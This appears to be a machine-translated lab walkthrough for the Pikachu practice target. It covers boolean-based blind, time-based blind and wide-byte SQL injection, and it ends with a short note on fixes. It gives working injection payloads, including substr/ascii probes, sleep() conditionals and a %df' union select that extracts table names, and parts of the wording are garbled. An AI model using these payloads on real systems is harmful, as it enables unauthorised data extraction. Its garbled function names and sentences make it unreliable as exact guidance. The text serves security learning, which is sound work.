pikachu~~~Boolean, time, wide byte blinds

table of Contents

Blinds based on boolian

Time-based blinds

wide byte injection

Blinds based on boolian

The error message is shielded, and only two situations are displayed: correct and incorrect

Try entering single quotes

Type and try

The more important bool injection is the value and operation functions such as lenth(), substr() function and ascii() function. The substr() function intercepts the letters of the string, and can participate after transcoding into numbers through the ascii() function Math is done. Such as:

select sustr(database(),1,1)>10

select ascii(sustr(database(),1,1))>10

select length(database())>10

Start injection: kobe' and ascii(substr(database(),1,1))>113#

If the content is displayed, the following expression is true, otherwise it is false

kobe' and ascii(substr(database(),1,1))=112#

kobe' and ascii(substr((select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA=database() limit 0,1),1,1))<112#

Time-based blinds

If the bool-based injection can be judged based on 0 or 1, then the time-based blind injection means nothing can be seen, and you cannot judge whether your statement is executed from the displayed difference. At this time, time-based blinds can be introduced.

If it finds input, it will immediately echo and report an error

Use sleep()

Enter kobe' and sleep(3)

It is found that the display is delayed by 3 seconds, so there is a vulnerability of sql time injection

That is to say, if the following statement is guessed correctly, it is delayed, and if it is incorrect, it will be echoed immediately.

kobe' and if((substr(database(),1,1))='p',sleep(5),null)#

wide byte injection

Capture packet after input injecting bytes

Because the addslashes()function of the function is to add a backslash ( '-> \') before the single quotation mark and other characters , after the url is encoded, %5c%27.our payload is [%df'], which is added in front %df( anything in %81-%febetween), that is %df%5c%27, the database at this time If GBK encoding is used, it will be regarded %df%5cas a wide character, and the %27single quotation mark will escape.

Order by field query, it is normal when you enter 2, and an error is reported when you enter 3, indicating that the number of fields is 2

Union joint query test the database:

Query table name: kobe%df' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()


'users'Single quotes are required next to the table name, so Burp can be used 'users'to convert it toconcat(char(39),char(117),char(115),char(101),char(114),char(115),char(39))

Details: https://blog.csdn.net/weixin_44426869/article/details/104341863?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162271214816780366593073%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255 .%2522%257D&request_id=162271214816780366593073&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_v2~rank_v29-9-104341863.first_rank_v2_pc_rank_v29&utm_term=p%ikachu%E5%AE97%BDE5%E5% 8A%82%E6%B3%A8%E5%85%A5&spm=1018.2226.3001.4187


For wide byte encoding, one of the best fixes is:

(1) Use mysql_set_charset (GBK) to specify the character set

(2) Use mysql_real_escape_string to escape

The principle is that the difference between mysql_real_escape_string and addslashes is that it will consider the currently set character set, and the problem of splicing e5 and 5c into one wide byte will not occur, but how to determine this "current character set"?

It is specified using mysql_set_charset.

The above two conditions are related to the "AND" operation, and none of them will work.